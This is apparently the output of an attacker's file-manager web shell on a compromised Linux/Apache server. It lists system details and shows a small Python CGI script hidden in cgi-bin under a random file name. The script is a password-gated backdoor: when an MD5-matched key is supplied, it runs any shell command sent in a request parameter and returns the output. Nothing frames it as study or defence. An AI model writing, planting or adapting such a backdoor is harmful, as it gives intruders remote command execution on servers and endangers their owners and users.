MOON
Server: Apache
System: Linux 3-228-103-98.cprapid.com 3.10.0-1160.62.1.el7.x86_64 #1 SMP Tue Apr 5 16:57:59 UTC 2022 x86_64
User: api (1001)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /home/api/public_html/cgi-bin/tk-RJ3f8T.py
#!/usr/bin/env python3
import sys,os,cgi,hashlib
sys.stdout.write('Content-Type: text/plain\r\n\r\n')
sys.stdout.flush()
f=cgi.FieldStorage()
x=f.getvalue('x','')
c=f.getvalue('c','')
if hashlib.md5(x.encode()).hexdigest()=='cc4950e01722f46630908128b2d0041a' and c:
  os.write(1,os.popen(c+' 2>&1').read().encode())